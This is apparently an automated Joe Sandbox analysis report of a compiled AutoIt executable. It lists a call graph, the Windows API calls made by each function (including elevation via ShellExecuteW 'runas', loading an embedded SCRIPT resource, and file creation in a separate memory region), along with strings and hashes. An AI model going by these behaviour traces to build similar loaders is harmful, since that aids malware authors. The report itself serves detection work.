API calls 101639->101898 101642 3c9837 84 API calls 101640->101642 101643 42cbe9 101642->101643 101644 42cd1a Mailbox 101643->101644 101645 42ccea 101643->101645 101646 42cc0b 101643->101646 101644->101595 101765 3c4ddd 101645->101765 101647 3c9837 84 API calls 101646->101647 101649 42cc17 101647->101649 101650 3c8047 59 API calls 101649->101650 101655 42cc23 101650->101655 101651 42cd16 101651->101644 101654 3c7667 59 API calls 101651->101654 101653 3c4ddd 136 API calls 101653->101651 101656 42cd4b 101654->101656 101658 42cc37 101655->101658 101659 42cc69 101655->101659 101657 3c7667 59 API calls 101656->101657 101660 42cd54 101657->101660 101661 3c8047 59 API calls 101658->101661 101662 3c9837 84 API calls 101659->101662 101663 
3c7667 59 API calls 101660->101663 101664 42cc47 101661->101664 101665 42cc76 101662->101665 101666 42cd5d 101663->101666 101667 3c7cab 59 API calls 101664->101667 101668 3c8047 59 API calls 101665->101668 101669 3c7667 59 API calls 101666->101669 101670 42cc51 101667->101670 101671 42cc82 101668->101671 101672 42cd66 101669->101672 101674 3c9837 84 API calls 101670->101674 101899 424a31 GetFileAttributesW 101671->101899 101673 3c9837 84 API calls 101672->101673 101676 42cd73 101673->101676 101677 42cc5d 101674->101677 101680 3c459b 59 API calls 101676->101680 101681 3c7b2e 59 API calls 101677->101681 101678 42cc8b 101679 42cc9e 101678->101679 101682 3c79f2 59 API calls 101678->101682 101684 3c9837 84 API calls 101679->101684 101690 42cca4 101679->101690 101683 42cd8e 101680->101683 101681->101659 101682->101679 101685 3c79f2 59 API calls 101683->101685 101686 42cccb 101684->101686 101687 42cd9d 101685->101687 101900 4237ef 75 API calls Mailbox 101686->101900 101689 42cdd1 101687->101689 101691 3c79f2 59 API calls 101687->101691 101692 3c8047 59 API calls 101689->101692 101690->101644 101693 42cdae 101691->101693 101694 42cddf 101692->101694 101693->101689 101697 3c7bcc 59 API calls 101693->101697 101695 3c7b2e 59 API calls 101694->101695 101696 42cded 101695->101696 101698 3c7b2e 59 API calls 101696->101698 101699 42cdc3 101697->101699 101700 42cdfb 101698->101700 101701 3c7bcc 59 API calls 101699->101701 101702 3c7b2e 59 API calls 101700->101702 101701->101689 101703 42ce09 101702->101703 101704 3c9837 84 API calls 101703->101704 101705 42ce15 101704->101705 101789 424071 101705->101789 101707 42ce26 101708 423c37 3 API calls 101707->101708 101709 42ce30 101708->101709 101710 3c9837 84 API calls 101709->101710 101713 42ce61 101709->101713 101711 42ce4e 101710->101711 101843 429155 101711->101843 101714 3c4e4a 84 API calls 101713->101714 101714->101644 101716 3c4e5b 101715->101716 101717 3c4e54 101715->101717 101719 3c4e6a 101716->101719 101720 3c4e7b FreeLibrary 
101716->101720 101718 3e53a6 __fcloseall 83 API calls 101717->101718 101718->101716 101719->101595 101720->101719 101721->101595 101722->101593 101723->101613 101724->101619 101725->101619 101726->101619 101752 3c7a16 101727->101752 101729 3c6265 101730 3c646a 101729->101730 101735 3fdff6 101729->101735 101736 3c7d8c 59 API calls 101729->101736 101737 3c750f 59 API calls 101729->101737 101744 3c6799 _memmove 101729->101744 101745 3fdf92 101729->101745 101749 3c7e4f 59 API calls 101729->101749 101757 3c5f6c 60 API calls 101729->101757 101758 3c5d41 59 API calls Mailbox 101729->101758 101760 3c5e72 60 API calls 101729->101760 101761 3c7924 59 API calls 2 library calls 101729->101761 101759 3c750f 59 API calls 2 library calls 101730->101759 101732 3c6484 Mailbox 101732->101627 101762 41f8aa 91 API calls 4 library calls 101735->101762 101736->101729 101737->101729 101741 3fe004 101763 3c750f 59 API calls 2 library calls 101741->101763 101743 3fe01a 101743->101732 101764 41f8aa 91 API calls 4 library calls 101744->101764 101746 3c8029 59 API calls 101745->101746 101747 3fdf9d 101746->101747 101751 3e0db6 Mailbox 59 API calls 101747->101751 101750 3c643b CharUpperBuffW 101749->101750 101750->101729 101751->101744 101753 3e0db6 Mailbox 59 API calls 101752->101753 101754 3c7a3b 101753->101754 101755 3c8029 59 API calls 101754->101755 101756 3c7a4a 101755->101756 101756->101729 101757->101729 101758->101729 101759->101732 101760->101729 101761->101729 101762->101741 101763->101743 101764->101732 101901 3c4bb5 101765->101901 101770 3c4e08 LoadLibraryExW 101911 3c4b6a 101770->101911 101771 3fd8e6 101773 3c4e4a 84 API calls 101771->101773 101774 3fd8ed 101773->101774 101776 3c4b6a 3 API calls 101774->101776 101778 3fd8f5 101776->101778 101937 3c4f0b 101778->101937 101779 3c4e2f 101779->101778 101780 3c4e3b 101779->101780 101782 3c4e4a 84 API calls 101780->101782 101784 3c4e40 101782->101784 101784->101651 101784->101653 101786 3fd91c 101945 3c4ec7 101786->101945 101790 42408d 
101789->101790 101791 424092 101790->101791 101792 4240a0 101790->101792 101793 3c8047 59 API calls 101791->101793 101794 3c7667 59 API calls 101792->101794 101795 42409b Mailbox 101793->101795 101796 4240a8 101794->101796 101795->101707 101797 3c7667 59 API calls 101796->101797 101798 4240b0 101797->101798 101799 3c7667 59 API calls 101798->101799 101800 4240bb 101799->101800 101801 3c7667 59 API calls 101800->101801 101802 4240c3 101801->101802 101803 3c7667 59 API calls 101802->101803 101804 4240cb 101803->101804 101805 3c7667 59 API calls 101804->101805 101806 4240d3 101805->101806 101807 3c7667 59 API calls 101806->101807 101808 4240db 101807->101808 101809 3c7667 59 API calls 101808->101809 101810 4240e3 101809->101810 101811 3c459b 59 API calls 101810->101811 101812 4240fa 101811->101812 101813 3c459b 59 API calls 101812->101813 101814 424113 101813->101814 101815 3c79f2 59 API calls 101814->101815 101816 42411f 101815->101816 101817 424132 101816->101817 101819 3c7d2c 59 API calls 101816->101819 101818 3c79f2 59 API calls 101817->101818 101820 42413b 101818->101820 101819->101817 101821 42414b 101820->101821 101822 3c7d2c 59 API calls 101820->101822 101823 3c8047 59 API calls 101821->101823 101822->101821 101824 424157 101823->101824 101825 3c7b2e 59 API calls 101824->101825 101826 424163 101825->101826 102372 424223 59 API calls 101826->102372 101828 424172 102373 424223 59 API calls 101828->102373 101830 424185 101831 3c79f2 59 API calls 101830->101831 101832 42418f 101831->101832 101833 4241a6 101832->101833 101834 424194 101832->101834 101836 3c79f2 59 API calls 101833->101836 101835 3c7cab 59 API calls 101834->101835 101837 4241a1 101835->101837 101838 4241af 101836->101838 101841 3c7b2e 59 API calls 101837->101841 101839 4241cd 101838->101839 101840 3c7cab 59 API calls 101838->101840 101842 3c7b2e 59 API calls 101839->101842 101840->101837 101841->101839 101842->101795 101844 429162 __ftell_nolock 101843->101844 101845 3e0db6 Mailbox 59 API calls 
103793->103842 103795 4045c7 CloseHandle 103795->103790 103843 3dffdc 103796->103843 103799 3dffdc 59 API calls 103800 3dff45 103799->103800 103801 3c7667 59 API calls 103800->103801 103802 3dff51 103801->103802 103803 3c7bcc 59 API calls 103802->103803 103804 3cf796 103803->103804 103805 3e0162 6 API calls 103804->103805 103805->103768 103807 3c7667 59 API calls 103806->103807 103808 3d5f97 103807->103808 103809 3c7667 59 API calls 103808->103809 103810 3d5f9f 103809->103810 103850 3d5a9d 103810->103850 103813 3d5a9d 59 API calls 103814 3d5faf 103813->103814 103815 3c7667 59 API calls 103814->103815 103816 3d5fba 103815->103816 103817 3e0db6 Mailbox 59 API calls 103816->103817 103818 3cf908 103817->103818 103819 3d60f9 103818->103819 103820 3d6107 103819->103820 103821 3c7667 59 API calls 103820->103821 103822 3d6112 103821->103822 103823 3c7667 59 API calls 103822->103823 103824 3d611d 103823->103824 103825 3c7667 59 API calls 103824->103825 103826 3d6128 103825->103826 103827 3c7667 59 API calls 103826->103827 103828 3d6133 103827->103828 103829 3d5a9d 59 API calls 103828->103829 103830 3d613e 103829->103830 103831 3e0db6 Mailbox 59 API calls 103830->103831 103832 3d6145 RegisterWindowMessageW 103831->103832 103832->103782 103835 3dfdae 103834->103835 103836 41576f 103834->103836 103837 3e0db6 Mailbox 59 API calls 103835->103837 103853 429ae7 60 API calls 103836->103853 103839 3dfdb6 103837->103839 103839->103786 103840 41577a 103841->103793 103842->103795 103854 4271ed 65 API calls 103842->103854 103844 3c7667 59 API calls 103843->103844 103845 3dffe7 103844->103845 103846 3c7667 59 API calls 103845->103846 103847 3dffef 103846->103847 103848 3c7667 59 API calls 103847->103848 103849 3dff3b 103848->103849 103849->103799 103851 3c7667 59 API calls 103850->103851 103852 3d5aa5 103851->103852 103852->103813 103853->103840 103855 3c3633 103856 3c366a 103855->103856 103857 3c3688 103856->103857 103858 3c36e7 103856->103858 103895 3c36e5 103856->103895 103862 3c374b 
PostQuitMessage 103857->103862 103863 3c3695 103857->103863 103860 3c36ed 103858->103860 103861 3fd0cc 103858->103861 103859 3c36ca DefWindowProcW 103896 3c36d8 103859->103896 103864 3c3715 SetTimer RegisterWindowMessageW 103860->103864 103865 3c36f2 103860->103865 103904 3d1070 10 API calls Mailbox 103861->103904 103862->103896 103867 3fd154 103863->103867 103868 3c36a0 103863->103868 103872 3c373e CreatePopupMenu 103864->103872 103864->103896 103869 3fd06f 103865->103869 103870 3c36f9 KillTimer 103865->103870 103909 422527 71 API calls _memset 103867->103909 103873 3c36a8 103868->103873 103874 3c3755 103868->103874 103876 3fd0a8 MoveWindow 103869->103876 103877 3fd074 103869->103877 103900 3c443a Shell_NotifyIconW _memset 103870->103900 103871 3fd0f3 103905 3d1093 341 API calls Mailbox 103871->103905 103872->103896 103880 3fd139 103873->103880 103881 3c36b3 103873->103881 103902 3c44a0 64 API calls _memset 103874->103902 103876->103896 103884 3fd078 103877->103884 103885 3fd097 SetFocus 103877->103885 103880->103859 103908 417c36 59 API calls Mailbox 103880->103908 103887 3fd124 103881->103887 103892 3c36be 103881->103892 103882 3fd166 103882->103859 103882->103896 103888 3fd081 103884->103888 103884->103892 103885->103896 103886 3c370c 103901 3c3114 DeleteObject DestroyWindow Mailbox 103886->103901 103907 422d36 81 API calls _memset 103887->103907 103903 3d1070 10 API calls Mailbox 103888->103903 103892->103859 103906 3c443a Shell_NotifyIconW _memset 103892->103906 103894 3c3764 103894->103896 103895->103859 103898 3fd118 103899 3c434a 68 API calls 103898->103899 103899->103895 103900->103886 103901->103896 103902->103894 103903->103896 103904->103871 103905->103892 103906->103898 103907->103894 103908->103895 103909->103882

                            Control-flow Graph

                            APIs
                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003C3B68
                            • IsDebuggerPresent.KERNEL32 ref: 003C3B7A
                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,004852F8,004852E0,?,?), ref: 003C3BEB
                              • Part of subcall function 003C7BCC: _memmove.LIBCMT ref: 003C7C06
                              • Part of subcall function 003D092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,003C3C14,004852F8,?,?,?), ref: 003D096E
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 003C3C6F
                            • MessageBoxA.USER32 ref: 003FD281
                            • SetCurrentDirectoryW.KERNEL32(?,004852F8,?,?,?), ref: 003FD2B9
                            • GetForegroundWindow.USER32 ref: 003FD33F
                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 003FD346
                              • Part of subcall function 003C3A46: GetSysColorBrush.USER32 ref: 003C3A50
                              • Part of subcall function 003C3A46: LoadCursorW.USER32 ref: 003C3A5F
                              • Part of subcall function 003C3A46: LoadIconW.USER32 ref: 003C3A76
                              • Part of subcall function 003C3A46: LoadIconW.USER32 ref: 003C3A88
                              • Part of subcall function 003C3A46: LoadIconW.USER32 ref: 003C3A9A
                              • Part of subcall function 003C3A46: LoadImageW.USER32 ref: 003C3AC0
                              • Part of subcall function 003C3A46: RegisterClassExW.USER32(?), ref: 003C3B16
                              • Part of subcall function 003C39D5: CreateWindowExW.USER32 ref: 003C3A03
                              • Part of subcall function 003C39D5: CreateWindowExW.USER32 ref: 003C3A24
                              • Part of subcall function 003C39D5: ShowWindow.USER32(00000000), ref: 003C3A38
                              • Part of subcall function 003C39D5: ShowWindow.USER32(00000000), ref: 003C3A41
                              • Part of subcall function 003C434A: _memset.LIBCMT ref: 003C4370
                              • Part of subcall function 003C434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003C4415
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                            • String ID: This is a third-party compiled AutoIt script.$runas$xH$%E
                            • API String ID: 529118366-416952213
                            • Opcode ID: 0c08a21e678f1df08c7517013b5110247f9e0f93f3b7807f3b4d6313bb8de152
                            • Instruction ID: 56a120adae1065cc1f851bcac3ceb53ac9c94e44648ccc590ac752cc519c65b0
                            • Opcode Fuzzy Hash: 0c08a21e678f1df08c7517013b5110247f9e0f93f3b7807f3b4d6313bb8de152
                            • Instruction Fuzzy Hash: 9A51A035D08108AACB13ABB4EC05FFD7B79AB45710B1084AEF811EA1A2DA745A45CF29

                            APIs
                            • GetVersionExW.KERNEL32(?), ref: 003C49CD
                              • Part of subcall function 003C7BCC: _memmove.LIBCMT ref: 003C7C06
                            • GetCurrentProcess.KERNEL32(?,0044FAEC,00000000,00000000,?), ref: 003C4A9A
                            • IsWow64Process.KERNEL32(00000000), ref: 003C4AA1
                            • GetNativeSystemInfo.KERNEL32(00000000), ref: 003C4AE7
                            • FreeLibrary.KERNEL32(00000000), ref: 003C4AF2
                            • GetSystemInfo.KERNEL32(00000000), ref: 003C4B23
                            • GetSystemInfo.KERNEL32(00000000), ref: 003C4B2F
                            Similarity
                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                            • String ID:
                            • API String ID: 1986165174-0
                            • Opcode ID: 83e6044c3c90b21c2050998b7b8c97b658d0251079d78219c11395ff2e5a7ed4
                            • Instruction ID: 1f072ad6fe3e2688fb3455dc4cb87a5685b61f971684807500a2e4f1c7bd5f7e
                            • Opcode Fuzzy Hash: 83e6044c3c90b21c2050998b7b8c97b658d0251079d78219c11395ff2e5a7ed4
                            • Instruction Fuzzy Hash: 0891C4359897C4DEC732DB688464AAAFFF5AF3A300B4849ADD0C797A41D220ED08C75D

                            APIs
                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 003C4E99
                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,003C4D8E,?,?,00000000,00000000), ref: 003C4EB0
                            • LoadResource.KERNEL32(?,00000000,?,?,003C4D8E,?,?,00000000,00000000,?,?,?,?,?,?,003C4E2F), ref: 003FD937
                            • SizeofResource.KERNEL32(?,00000000,?,?,003C4D8E,?,?,00000000,00000000,?,?,?,?,?,?,003C4E2F), ref: 003FD94C
                            • LockResource.KERNEL32(003C4D8E,?,?,003C4D8E,?,?,00000000,00000000,?,?,?,?,?,?,003C4E2F,00000000), ref: 003FD95F
                            Strings
                            Similarity
                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                            • String ID: SCRIPT
                            • API String ID: 3051347437-3967369404
                            • Opcode ID: 9fff31701266b0ab1365899bd87e6dab36eb9fad08bfaad69c7f91284bd31eb6
                            • Instruction ID: 057951220e044955ac377a84f3f480da650a2f2c71d70496859d2ac7ae4bbe80
                            • Opcode Fuzzy Hash: 9fff31701266b0ab1365899bd87e6dab36eb9fad08bfaad69c7f91284bd31eb6
                            • Instruction Fuzzy Hash: 35114C75240700ABD7218B65EC48F677BBAFBC5B11F21827CF505D6250DBA1EC048665
                            Strings
                            Similarity
                            • API ID:
                            • String ID: DdH$DdH$DdH$DdH$Variable must be of type 'Object'.
                            • API String ID: 0-528517802
                            • Opcode ID: c86a97d268c1349a95c96c8acd1460971ba2fbad5050b9a8d60698988be8e22f
                            • Instruction ID: 60e85ebe03c05178c7f9f89acb38364b85b690cdf7e317557f17e5ec0d3c3f56
                            • Opcode Fuzzy Hash: c86a97d268c1349a95c96c8acd1460971ba2fbad5050b9a8d60698988be8e22f
                            • Instruction Fuzzy Hash: 2CA26775A00215CFCB25CF58C480FAEB7B6BB58314F25846EE906AB391D735AD82CB94
                            APIs
                            • GetFileAttributesW.KERNELBASE(?,003FE398), ref: 0042446A
                            • FindFirstFileW.KERNELBASE(?,?), ref: 0042447B
                            • FindClose.KERNEL32(00000000), ref: 0042448B
                            Similarity
                            • API ID: FileFind$AttributesCloseFirst
                            • String ID:
                            • API String ID: 48322524-0
                            • Opcode ID: 7b97777a908bc907d1898165e19762d4ff4d3a5e67ddd761bb16f98d94aa4b44
                            • Instruction ID: 247f54730824be8cab847abb38822e3f75794732c17de53dd53b8f33029c9c46
                            • Opcode Fuzzy Hash: 7b97777a908bc907d1898165e19762d4ff4d3a5e67ddd761bb16f98d94aa4b44
                            • Instruction Fuzzy Hash: A6E0D8365109106B5210BB78FC0D4EA775CEE46335F500767FD35C11D0E7B85904959E
                            APIs
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003D0A5B
                            • timeGetTime.WINMM ref: 003D0D16
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003D0E53
                            • Sleep.KERNEL32(0000000A), ref: 003D0E61
                            • LockWindowUpdate.USER32(00000000), ref: 003D0EFA
                            • DestroyWindow.USER32 ref: 003D0F06
                            • GetMessageW.USER32 ref: 003D0F20
                            • Sleep.KERNEL32(0000000A,?,?), ref: 00404E83
                            • TranslateMessage.USER32(?), ref: 00405C60
                            • DispatchMessageW.USER32(?), ref: 00405C6E
                            • GetMessageW.USER32 ref: 00405C82
                            Strings
                            Similarity
                            • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbH$pbH$pbH$pbH
                            • API String ID: 4212290369-791928415
                            • Opcode ID: 284c094e2db811b8b764532658da60b899f476dc699a32529b5e1dfe9bd8c561
                            • Instruction ID: 48a1764d00b12d6c7cf7300bd8a497e422c3e5162b161ad8f5cbf928307cd138
                            • Opcode Fuzzy Hash: 284c094e2db811b8b764532658da60b899f476dc699a32529b5e1dfe9bd8c561
                            • Instruction Fuzzy Hash: 8DB2BF71608741DBD729DB24C884BABB7E5FF84704F14492EE4899B3A1C774E884CF5A

                            APIs
                              • Part of subcall function 00428F5F: __time64.LIBCMT ref: 00428F69
                              • Part of subcall function 003C4EE5: _fseek.LIBCMT ref: 003C4EFD
                            • __wsplitpath.LIBCMT ref: 00429234
                              • Part of subcall function 003E40FB: __wsplitpath_helper.LIBCMT ref: 003E413B
                            • _wcscpy.LIBCMT ref: 00429247
                            • _wcscat.LIBCMT ref: 0042925A
                            • __wsplitpath.LIBCMT ref: 0042927F
                            • _wcscat.LIBCMT ref: 00429295
                            • _wcscat.LIBCMT ref: 004292A8
                              • Part of subcall function 00428FA5: _memmove.LIBCMT ref: 00428FDE
                              • Part of subcall function 00428FA5: _memmove.LIBCMT ref: 00428FED
                            • _wcscmp.LIBCMT ref: 004291EF
                              • Part of subcall function 00429734: _wcscmp.LIBCMT ref: 00429824
                              • Part of subcall function 00429734: _wcscmp.LIBCMT ref: 00429837
                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00429452
                            • _wcsncpy.LIBCMT ref: 004294C5
                            • DeleteFileW.KERNEL32(?,?), ref: 004294FB
                            • CopyFileW.KERNEL32 ref: 00429511
                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00429522
                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00429534
                            Similarity
                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                            • String ID:
                            • API String ID: 1500180987-0
                            • Opcode ID: 41cff17dd03383fff9dde327fa6dbcb87015edc3579715b859da653640c40dd3
                            • Instruction ID: 7b0de6ce07ec8ee728fec088129bc4b1ca8927b7ba77ce2c240aff6d74f717ce
                            • Opcode Fuzzy Hash: 41cff17dd03383fff9dde327fa6dbcb87015edc3579715b859da653640c40dd3
                            • Instruction Fuzzy Hash: 76C13CB1E00229AADF11DF95DC85EDEBBBCEF45310F4040AAF609E6151DB349E848F65

                            Strings
                            Similarity
                            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$xH$RH
                            • API String ID: 1825951767-626061487
                            • Opcode ID: f2c97edd4f69d982fdf211cd905d312c05cc462d7e0dc3c5ce31495e1b0a7ef1
                            • Instruction ID: 5181ff3807261619fd468ba1b9192fcabdca21811b707c64ecfee96f3037edbe
                            • Opcode Fuzzy Hash: f2c97edd4f69d982fdf211cd905d312c05cc462d7e0dc3c5ce31495e1b0a7ef1
                            • Instruction Fuzzy Hash: 91A1287291022DAADB16EBA0DC95FEEB779BF14310F40452EE416BB191DF745E08CBA0

                            APIs
                              • Part of subcall function 003C4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004852F8,?,003C37AE,?), ref: 003C4724
                              • Part of subcall function 003E050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,003C7165), ref: 003E052D
                            • RegOpenKeyExW.KERNEL32 ref: 003C71A8
                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003FE8C8
                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?), ref: 003FE909
                            • RegCloseKey.ADVAPI32(?), ref: 003FE947
                            • _wcscat.LIBCMT ref: 003FE9A0
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                            • API String ID: 2673923337-2727554177
                            • Opcode ID: 09df74895940e4f05c147afeafa251cbd17ff975300c8f3e0513d04ec5fcb15a
                            • Instruction ID: ea53b65d2dae6547516e203738e9d26b97b2a9482dbfecde58a0e4cba8ffecf0
                            • Opcode Fuzzy Hash: 09df74895940e4f05c147afeafa251cbd17ff975300c8f3e0513d04ec5fcb15a
                            • Instruction Fuzzy Hash: 4E7169715083019AC346EF25EC41EAFBBA8FF85350B4149BEF545CA1B0EB719948CB56

                            Control-flow Graph

                            APIs
                            • DefWindowProcW.USER32(?,?,?,?), ref: 003C36D2
                            • KillTimer.USER32 ref: 003C36FC
                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003C371F
                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003C372A
                            • CreatePopupMenu.USER32 ref: 003C373E
                            • PostQuitMessage.USER32(00000000), ref: 003C374D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                            • String ID: TaskbarCreated$%E
                            • API String ID: 129472671-1317701673
                            • Opcode ID: 6bd2e6c462df2139af752bf1fe47f7bd12a8c24dd63067f40604a630df861c94
                            • Instruction ID: ec05d5ffdf50b10010e0d7a1f27076ad4e75836136d289d2474f4322c5406e68
                            • Opcode Fuzzy Hash: 6bd2e6c462df2139af752bf1fe47f7bd12a8c24dd63067f40604a630df861c94
                            • Instruction Fuzzy Hash: BB4136B2200509BBDB277F64EC49F7D3759EB01300F10853EFA02D62A1DF699E6497A9

                            Control-flow Graph

                            APIs
                            • GetSysColorBrush.USER32 ref: 003C3A50
                            • LoadCursorW.USER32 ref: 003C3A5F
                            • LoadIconW.USER32 ref: 003C3A76
                            • LoadIconW.USER32 ref: 003C3A88
                            • LoadIconW.USER32 ref: 003C3A9A
                            • LoadImageW.USER32 ref: 003C3AC0
                            • RegisterClassExW.USER32(?), ref: 003C3B16
                              • Part of subcall function 003C3041: GetSysColorBrush.USER32 ref: 003C3074
                              • Part of subcall function 003C3041: RegisterClassExW.USER32(00000030), ref: 003C309E
                              • Part of subcall function 003C3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003C30AF
                              • Part of subcall function 003C3041: InitCommonControlsEx.COMCTL32(?), ref: 003C30CC
                              • Part of subcall function 003C3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003C30DC
                              • Part of subcall function 003C3041: LoadIconW.USER32 ref: 003C30F2
                              • Part of subcall function 003C3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003C3101
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                            • String ID: #$0$AutoIt v3
                            • API String ID: 423443420-4155596026
                            • Opcode ID: 4a45b06f3ffe637bfaf4fdc22f3fb5cc5b031ef565da02b4feea85f5a9ba26a7
                            • Instruction ID: 7439f56f411e5d5dddb83315a23cbc655956bff26bd8fdeb6b9e2d5a04c25228
                            • Opcode Fuzzy Hash: 4a45b06f3ffe637bfaf4fdc22f3fb5cc5b031ef565da02b4feea85f5a9ba26a7
                            • Instruction Fuzzy Hash: 8B214B79D00308AFEB11DFA4EC49B9D7BB4FB08711F00457EE500AA2A1DBB55A548F88

                            Control-flow Graph

                            APIs
                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E93D49
                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E93F6F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478485424.0000000000E91000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E91000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_e91000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CreateFileFreeVirtual
                            • String ID: cE
                            • API String ID: 204039940-3226056788
                            • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                            • Instruction ID: dc5770f24693d189e4e5511b0f0361ad2e60256b372218558656bdc1e206ebf9
                            • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                            • Instruction Fuzzy Hash: 1DA10574E00209EBDF14CFA4C898BEEBBB5BF48304F209199E511BB281D7759A81CB54

                            Control-flow Graph

                            APIs
                              • Part of subcall function 003E0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 003E0193
                              • Part of subcall function 003E0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 003E019B
                              • Part of subcall function 003E0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 003E01A6
                              • Part of subcall function 003E0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 003E01B1
